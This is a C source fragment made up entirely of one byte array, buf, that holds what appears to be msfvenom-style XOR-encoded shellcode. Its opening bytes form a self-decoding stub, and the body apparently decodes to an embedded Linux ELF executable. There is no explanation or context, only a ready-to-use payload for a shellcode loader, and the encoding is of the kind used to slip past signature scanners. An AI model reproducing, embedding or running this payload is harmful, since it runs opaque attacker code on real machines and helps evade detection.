unsigned char buf[] = 
"\x48\x31\xc9\x48\x81\xe9\x62\xff\xff\xff\x48\x8d\x05\xef"
"\xff\xff\xff\x48\xbb\x08\x85\x70\x72\xc2\x28\x22\xb3\x48"
"\x31\x58\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4\x77\xc0\x3c"
"\x34\xc0\x29\x23\xb3\x08\x85\x70\x72\xc2\x28\x22\xb3\x09"
"\x85\x4e\x72\xc3\x28\x22\xb3\x08\x85\x70\x72\xc2\x28\x22"
"\xb3\x08\x85\x70\x72\xc2\x28\x22\xb3\x48\x85\x70\x72\xc2"
"\x28\x22\xb3\x08\x85\x70\x72\x82\x28\x22\xb3\x08\x85\x30"
"\x72\xca\x28\x26\xb3\x08\x85\x70\x72\xc2\x28\x22\xb3\x08"
"\x85\x70\x72\xc2\x28\x22\xb3\x08\x85\x70\x72\xc2\x28\x22"
"\xb3\x08\x85\x70\x72\xc2\x28\x22\xb3\x08\x85\x70\x72\xc2"
"\x28\x22\xb3\x08\x85\x70\x72\xc2\x28\x22\xb3\x08\x85\x70"
"\x72\xc2\x28\x22\xb3\x08\x85\x70\x72\xc2\x28\x22\xb3\x09"
"\x85\x70\x72\xca\x28\x22\xb3\x0b\x85\x70\x72\xc2\x28\x22"
"\xb3\x08\x85\x70\x72\xc2\x28\x22\xb3\x48\x87\x70\x72\xc2"
"\x28\x22\xb3\x18\x85\x70\x72\xc2\x28\x22\xb3\x08\x85\x70"
"\x72\xc2\x28\x22\xb3\x0c\x85\x70\x72\xc2\x28\x22\xb3\x08"
"\x85\x70\x72\xc2\x28\x22\xb3\x0e\x85\x70\x72\xc3\x28\x22"
"\xb3\x0b\x85\x70\x72\xc2\x28\x22\xb3\x08\x85\x70\x72\xc2"
"\x28\x22\xb3\x48\x87\x70\x72\xc2\x28\x22\xb3\x27\x85\x70"
"\x72\xc2\x28\x22\xb3\x08\x85\x70\x72\xc2\x28\x22\xb3\x0c"
"\x85\x70\x72\xc2\x28\x22\xb3\x08\x85\x70\x72\xc2\x28\x22"
"\xb3\x04\x85\x70\x72\xc3\x28\x22\xb3\x0e\x85\x70\x72\xc2"
"\x28\x22\xb3\x08\x85\x70\x72\xc2\x28\x22\xb3\x78\x87\x70"
"\x72\xc2\x28\x22\xb3\x64\x85\x70\x72\xc2\x28\x22\xb3\x08"
"\x85\x70\x72\xc2\x28\x22\xb3\x18\x85\x70\x72\xc2\x28\x22"
"\xb3\x08\x85\x70\x72\xc2\x28\x22\xb3\x1a\x85\x70\x72\xc1"
"\x28\x22\xb3\x08\x85\x70\x72\xc2\x28\x22\xb3\x08\x85\x70"
"\x72\xc2\x28\x22\xb3\xe8\x87\x70\x72\xc2\x28\x22\xb3\x3f"
"\x85\x70\x72\xc2\x28\x22\xb3\x08\x85\x70\x72\xc2\x28\x22"
"\xb3\x09\x85\x70\x72\xc2\x28\x22\xb3\x08\x85\x70\x72\xc2"
"\x28\x22\xb3\x14\x85\x70\x72\xc0\x28\x22\xb3\x08\x85\x70"
"\x72\xc2\x28\x22\xb3\x08\x85\x70\x72\xc2\x28\x22\xb3\x28"
"\x86\x70\x72\xc2\x28\x22\xb3\x28\x84\x70\x72\xc2\x28\x22"
"\xb3\x0e\x85\x70\x72\xc9\x28\x22\xb3\x00\x85\x70\x72\xc2"
"\x28\x22\xb3\x10\x85\x70\x72\xc2\x28\x22\xb3\x2c\x85\x70"
"\x72\xc1\x28\x22\xb3\x08\x85\x70\x72\xc2\x28\x22\xb3\x08"
"\x85\x70\x72\xc2\x28\x22\xb3\x48\x81\x70\x72\xc2\x28\x22"
"\xb3\x4d\x85\x70\x72\xc2\x28\x22\xb3\x08\x85\x70\x72\xc2"
"\x28\x22\xb3\x09\x85\x70\x72\xc2\x28\x22\xb3\x08\x85\x70"
"\x72\xc2\x28\x22\xb3\x24\x85\x70\x72\xc6\x28\x22\xb3\x08"
"\x85\x70\x72\xc2\x28\x22\xb3\x08\x85\x70\x72\xc2\x28\x22"
"\xb3\x98\x81\x70\x72\xc2\x28\x22\xb3\x68\x85\x70\x72\xc2"
"\x28\x22\xb3\x0d\x85\x70\x72\xc1\x28\x22\xb3\x00\x85\x70"
"\x72\xc2\x28\x22\xb3\x10\x85\x70\x72\xc2\x28\x22\xb3\x4d"
"\xeb\x04\x00\xa7\x5a\x02\xc6\x66\xa5\x1e\x1d\xaf\x4a\x50"
"\xd6\x28\xad\x02\x17\xb6\x47\x57\xc1\x66\xe0\x50\x42\xe2"
"\x5b\x4b\x93\x78\xe4\x19\x00\xee\x08\x13\x93\x7b\xec\x1e"
"\x1d\xac\x01\x18\xb3\xb2\xaa\x70\x72\xc2\x60\x9b\xb3\x08"
"\x85\x70\x72\xc2\x28\x22\x08\x09\x85\x70\x72\x7a\x2c\x22"
"\xb3\x08\x48\xf0\xca\xc1\x28\x22\xb3\xb3\x85\x70\x72\xc2"
"\x60\x9b\xb3\x08\x85\x70\x72\xc2\x28\x22\x09\x18\x85\x70"
"\x72\x0f\xa8\x9b\xa3\x08\x85\x70\xf8\x43\x28\x22\xb3\x08"
"\xb9\x7a\x06\xc9\x60\xdd\x7a\x40\x06\x89\x72\xb6\x3f\xc9"
"\x58\x40\x3d\x70\x72\xc2\x28\x22\xb3\x08\x85\x38\x73\x0a"
"\x60\xdd\x7b\x82\x9d\xf0\x91\xc3\x90\x23\xb3\x08\x85\xbd"
"\xf2\xc2\x28\x22\xb3\x08\xab\x12\x01\xb1\x28\x0c\xd7\x69"
"\xf1\x11\x72\xec\x5c\x47\xcb\x7c\x85\x5e\x01\xaa\x5b\x56"
"\xc1\x7c\xe4\x12\x72\xec\x5b\x5b\xde\x7c\xe4\x12\x72\xec"
"\x5b\x56\xc1\x7c\xe4\x12\x72\xec\x5a\x47\xdf\x69\xab\x04"
"\x17\xba\x5c\x22\xb3\x08\x85\x70\x72\xc2\x28\x22\xb3\x08"
"\x85\x70\x72\xc2\x28\x22\xb3\x08\x85\x70\x72\xc2\x28\x22"
"\xb3\x08\x85\x70\x72\xc2\x28\x22\xb3\x09\x85\x70\x72\xc6"
"\x28\xd3\x4c\x08\x85\x70\x72\xc2\x28\x22\xb3\x08\x85\x70"
"\x72\xc2\x28\x22\xb3\x08\x85\x70\x72\xc1\x28\x23\xb3\x08"
"\x85\x70\x72\xc2\x28\x22\xb3\x08\x85\x70\x72\xc2\x28\x22"
"\xb3\x08\x85\x70\x72\xc1\x28\x20\xb3\x08\x85\x70\x72\xc2"
"\x28\x22\xb3\x08\x85\x70\x72\xc2\x28\x22\xb3\x08\x85\x70"
"\x72\xc1\x28\x21\xb3\x08\x85\x70\x72\xc2\x28\x22\xb3\x08"
"\x85\x70\x72\xc2\x28\x22\xb3\x1a\x85\x70\x72\xc2\x28\x23"
"\xb3\x08\x85\x70\x72\xc2\x28\x22\xb3\x08\x85\x70\x72\xc2"
"\x28\x22\xb3\x10\x85\x70\x72\xc2\x28\x20\xb3\x08\x85\x70"
"\x72\xc2\x28\x22\xb3\x08\x85\x70\x72\xc2\x28\x22\xb3\x17"
"\x85\x70\x72\xc2\x28\xd3\x4c\x27\x85\x70\x72\xc2\x28\x22"
"\xb3\x08\x85\x70\x72\xc2\x28\x22\xb3\x39\x85\x70\x72\xc2"
"\x28\x21\xb3\x33\x85\x70\x72\xc2\x28\x22\xb3\x08\x85\x70"
"\x72\xc2\x28\x22\xb3\x3e\x85\x70\x72\xc2\x28\x21\xb3\x58"
"\x85\x70\x72\xc2\x28\x22\xb3\x08\x85\x70\x72\xc2\x28\x22"
"\xb3\x49\x85\x70\x72\xc2\x28\x21\xb3\x6d\x85\x70\x72\xc2"
"\x28\x22\xb3\x08\x85\x70\x72\xc2\x28\x22\xb3\x22\x85\x70"
"\x72\xd2\x28\x21\xb3\x08\x85\x70\x72\xc2\x28\x22\xb3\x08"
"\x85\x70\x72\xc2\x28\x22\xb3\x08\xab\x5e\x5d\xa3\x5b\x4f"
"\x85\x3c\xaa\x11\x01\xaf\x18\x16\x9d\x7b\x85\x19\x1c\xb2"
"\x5d\x56\xb3\x78\xf7\x1f\x1f\xb2\x5c\x22\xc3\x7a\xea\x1d"
"\x02\xb6\x77\x4e\xd6\x66\x85\x2f\x01\xb6\x49\x50\xc7\x08"
"\xe9\x1f\x1d\xb2\x28\x41\xdb\x6d\xe6\x1b\x2d\xb2\x49\x4b"
"\xc1\x08\xe0\x1e\x16\xc2\x28\x22\xb3\x08\x85\x70\x72\xc2"
"\x28\x22\xb3\x0f\x85\x70\x72\xc2\x28\x22\xb3\x09\x85\x70"
"\x72\xc1\x28\x22\xb3\x08\x85\x70\x72\xc2\x28\x22\xb3\x2f"
"\x85\x70\x72\xc2\x28\x22\xb3\x09\x85\x70\x72\xc0\x28\x22"
"\xb3\x08\x85\x70\x72\xc2\x28\x22\xb3\x35\x85\x70\x72\xc2"
"\x28\x22\xb3\x03\x85\x70\x72\xc0\x28\x22\xb3\x08\x85\x70"
"\x72\xc2\x28\x22\xb3\x5a\x85\x70\x72\xc2\x28\x22\xb3\x09"
"\x85\x70\x72\xc0\x28\x22\xb3\x08\x85\x70\x72\xc2\x28\x22"
"\xb3";
